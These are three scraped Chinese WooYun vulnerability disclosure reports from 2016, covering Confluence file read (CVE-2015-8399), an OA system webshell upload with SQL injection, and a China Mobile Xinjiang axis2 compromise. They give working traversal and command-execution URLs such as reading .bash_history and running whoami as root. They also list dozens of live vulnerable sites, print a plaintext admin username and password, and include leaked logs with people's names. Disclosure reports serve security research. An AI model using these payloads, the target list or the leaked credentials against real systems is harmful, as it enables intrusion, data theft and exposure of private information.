漏洞详情披露状态： 2016-05-11： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：也许我们该拯救一下世界了。仅供娱乐~详细说明：感觉这个洞杀伤力还是挺强的，详情在这里code 区域http://**.**.**.**/content/27104CVE描述的是可以读取配置文件https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399 比如jetbrains的这个洞我之前已邮件jetbrans，他们正在修复中其他敏感目录code 区域/WEB-INF/decorators.xml /WEB-INF/glue-config.xml /WEB-INF/server-config.wsdd /WEB-INF/sitemesh.xml /WEB-INF/urlrewrite.xml /WEB-INF/web.xml /databaseSubsystemContext.xml /securityContext.xml /services/statusServiceContext.xml com/atlassian/confluence/security/SpacePermission.hbm.xml com/atlassian/confluence/user/OSUUser.hbm.xml com/atlassian/confluence/security/ContentPermissionSet.hbm.xml com/atlassian/confluence/user/ConfluenceUser.hbm.xml有权限的话就不只是读个配置文件这么简单了http://**.**.**.**读取bash_historycode 区域https://**.**.**.**//spaces/viewdefaultdecorator.action?decoratorName=file:///home/confluence/.bash_historyweb.xml敏感文件.db漏洞证明：**.**.**.****.**.**.****.**.**.**还有好多code 区域http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:8090 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://cwiki.**.**.**.** http://**.**.**.** http://www.beecom.ch http://confluence.slac.**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** http://wiki.auckland.ac.nz http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://cwiki.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://docs.**.**.**.** http://doc.ez.no http://www.meta-inf.hu http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://confluence.ryerson.ca http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** https://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** https://**.**.**.**.au http://**.**.**.**.au http://**.**.**.** https://wiki.nci.nih.gov https://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.**脚本：code 区域https://**.**.**.**/Xyntax/POC-T/blob/master/module/confluence-file-read.py 修复方案：jetbrains还在思考:版权声明：转载请注明来源 xyntax@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：16确认时间：2016-05-11 15:01厂商回复：CNVD确认所述漏洞情况，暂未建立与上述网站管理单位的直接处置渠道，待认领。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述： 详细说明：http://oa.my089.cn:7001/defaultroot/Logon!logon.action参考： WooYun: 万户OA多个漏洞打包(任意文件上传.XXE.SQL注射) 上传文件成功：http://oa.my089.cn:7001/defaultroot/upload/test/999999/999999.jspx?cmd=whoami任意命令执行了：威胁内网安全：SQL注入：将数据包保存为txt，上sqlmap可获取用户的登陆信息，随便get一个试试可查看邮件，包含敏感信息：不深入了。漏洞证明： 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-10 09:51厂商回复：是内部自动化办公系统的漏洞，已第一时间采取了临时措施并协同厂商修复。不会对红岭用户信息造成任何影响。感谢白帽子！最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：中国移动通信集团新疆集团通讯录某处文件包含导致命令执行Getshell详细说明：中国移动通信集团新疆有限公司 技术支持**.**.**.**:8080/**.**.**.**:8080/axis2/services/Version?xsd=../conf/axis2.xmlcode 区域<parameter name="userName">jttxl_axis_username</parameter><parameter name="password">axisSf*sji3255</parameter>**.**.**.**:8080/axis2/axis2-admin/listService登录 axis2、**.**.**.**:8080//axis2/services/Cat/exec?cmd=whoamiroot 权限/opt/apache-tomcat-7.0.55/webapps/axis2/WEB-INF/titlees/下面还存在文件遍历、4**.**.**.**:8080/download/**.**.**.**:8080/download/indextomcat.jsp直接getshell、**.**.**.**:8080/Group/logs/smms.log日志泄漏信息[jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8]][2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [08558047627791600147, 张丽,魏爱东等]][2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [99021592896422007516, 魏国孝,王檬等]]**.**.**.**:8080/fileser/resources/image/upload/文件遍历信息泄漏、**.**.**.**:8080//axis2/services/Cat/exec?cmd=cat%20%20/root/.mysql_historylinux中mysql记录、code 区域NULL COMMENT '新疆移动二级部门', `area_code` varchar(10) DEFAULT NULL COMMENT '地州编码', `area_name` varchar(64) DEFAULT NULL COMMENT '地州名称', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE `sys_dept_area_info` ( `id` varchar(32) NOT NULL, `department_name` varchar(64) NOT NULL COMMENT '新疆移动二级部门', `area_code` varchar(10) DEFAULT NULL COMMENT '地州编码', `area_name` varchar(64) DEFAULT NULL COMMENT '地州名称', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0000', '乌鲁木齐市分公司', '6501', '乌鲁木齐'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0001', '阿克苏分公司', '6529', '阿克苏'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0002', '区公司', '6501', '乌鲁木齐'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0003', '新开户', '6501', '乌鲁木齐'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0004', '阿勒泰分公司', '6543', '阿勒泰'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0005', '巴州分公司', '6528', '巴州'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0006', '博州移动公司', '6527', '博州'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0007', '昌吉分公司', '6523', '昌吉'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0008', '哈密分公司', '6522', '哈密'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0009', '和田分公司', '6532', '和田'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0010', '喀什分公司', '6531', '喀什'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0011', '克拉玛依分公司', '6502', '克拉玛依'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0012', '克州移动', '6530', '克州'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0013', '奎屯分公司', '654003', '奎屯'); INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0014', '石河子分公司', '659001', '石河子');信任连接、code 区域**.**.**.**]:30000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApWKcM1Ltsn0e8D32Yn4ZnAIcdMKfuGTQ5/S4thMk0mgl2RRljKFjKvy4ElkN1HS9/2bQ8iL3gOWHVGUYm9Nh9izMhPO6E6Z6o3wwpaxmKhJQVRbbWsQ+07widH7AAs8IP5dTJ8OjcEawcknnjorZaAn7xvotA+mTbPL8Kag8Bn2Sp4Ln44VQB2bATBq6kHUf1f3z+tFzyjMDkOjSb6RPCNYN4kEaglL0RgE71SpoLTg4VQ1s662rdTifDtFRR0kj8CJi0DkdvMKKmWwa6eMak92ScD4EmBNkOOGpJT2d1d7nprvyK4DtMumTSjEMhYjGdB/x3yAh87Pr7/3QrMQLgw== [**.**.**.**]:30000 ssh-rsaok漏洞证明：上面的了修复方案：升级axis2!版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-04-29 10:46厂商回复：CNVD确认并复现所述情况，已经转由CNCERT向中国移动集团公司通报，由其后续协调网站管理部门处置。最新状态：暂无